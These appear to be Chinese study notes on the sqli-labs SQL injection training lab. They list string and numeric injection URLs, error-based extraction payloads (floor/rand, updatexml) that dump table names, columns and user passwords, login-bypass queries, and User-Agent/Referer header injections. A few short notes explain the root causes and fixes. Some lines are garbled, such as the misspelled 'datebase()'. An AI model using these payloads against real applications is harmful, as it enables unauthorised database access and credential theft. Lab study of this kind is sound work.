1:字符:http://localhost/sql/Less-1/index.php?id=2' or '1=1 //2' or '1'='1
2:数字:http://localhost/sql/Less-2/index.php?id=2 or 1=1
爆表名:
(1)http://localhost/sql/Less-2/index.php?id=1+and(select%202%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,table_name,0x7e)%20FROM%20information_schema.tables%20where%20table_schema=database()%20LIMIT%202,1))%20from%20information_schema.tables%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
(2)http://localhost/sql/Less-2/index.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),0x7e),1)--
SELECT * FROM users WHERE id=1 and updatexml(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- LIMIT 1,1
爆字段:
(1)http://localhost/sql/Less-2/index.php?id=1+and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,column_name,0x7e)%20FROM%20information_schema.columns%20where%20table_name=0x7573657273%20LIMIT%202,1))%20from%20information_schema.tables%20limit%202,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
(2)http://localhost/sql/Less-2/index.php?id=1%20and%20updatexml(1,concat(0x7e,(SELECT%20distinct%20concat(0x7e,column_name,0x7e)%20FROM%20information_schema.columns%20where%20table_name=0x7573657273%20LIMIT%200,1),0x7e),1)--
SELECT * FROM users WHERE id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x7573657273 LIMIT 0,1),0x7e),1)-- LIMIT 1,1
爆内容:http://localhost/sql/Less-2/index.php?id=1+and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x23,username,0x3a,password,0x23)%20FROM%20users%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
updatexml(爆版本):代码:http://localhost/sql/Less-2/index.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20version()),0x7e),1)--
3:where()'字符:http://localhost/sql/Less-3/index.php?id=2 'or '1=1 //2' or '1'='1
4:where()"字符:http://localhost/sql/Less-4/index.php?id=2" or "1=1
代码:$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
(根本原因:$id 未经任何处理就被拼接进 SQL 字符串,外层再包一层引号和括号并不构成过滤;修复方式是改用预处理语句并绑定参数,而不是拼接字符串。)
5:where '字符:http://localhost/sql/Less-5/index.php?id=33'or'1=1
代码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
6:where "字符:http://localhost/sql/Less-6/index.php?id=33"or "1=1
7:WHERE id=(('$id')) '字符:http://localhost/sql/Less-7/index.php?id=30'or '1=1
MySQL 的三种注释:`#`、`-- `、`/* ... */`
1.代码:SELECT username, password FROM users WHERE username='a'or'1'='1'-- '' and password='' LIMIT 0,1
2.代码:SELECT username, password FROM users WHERE username=("")or "1"="1"-- 1") and password=("a") LIMIT 0,1
3:代码:SELECT username, password FROM users WHERE username=('1')or('ab'='a' 'b') and password=('1')or('ab'='a' 'b') LIMIT 0,1
或者:SELECT username, password FROM users WHERE username=('')or '1'='1'-- 1') and password=('a') LIMIT 0
4:代码:SELECT username, password FROM users WHERE username="aa" or"1"="1"-- "" and password="a" LIMIT 0,1
5:代码:SELECT username, password FROM users WHERE username='a'or'1'='1'-- '' and password='a' LIMIT 0,1
6:代码:SELECT username, password FROM users WHERE username=("")or 1=1-- (") and password=("a") LIMIT 0,1
7:admin a' or updatexml(1,concat(0x5e24,version(),0x5e24),1)#
18:Your User Agent is: Mozilla/5.0'or updatexml(0,concat(0x2b5e,datebase(),0x2b5e),0),'','')#
9:SELECT users.username, users.password FROM users WHERE users.username='admin' and users.password='admin' ORDER BY users.id DESC LIMIT 0,1
INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('http://120.76.137.195/sql/Less-19/'or updatexml(0,concat(0x2b5e,datebase(),0x2b5e),0),'')#', '58.23.96.219')
Your Referer is: http://120.76.137.195/sql/Less-19/'or updatexml(0,concat(0x2b5e,datebase(),0x2b5e),0),'')#
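FUNCTION security.datebase does not exist
(注:这是数据库返回的原始错误,原因是函数 datebase 不存在。错误文本本身已带出库名 security;若该信息出现在页面响应中,说明应用把数据库错误直接回显给了客户端,应关闭错误回显,只在服务端日志中记录。)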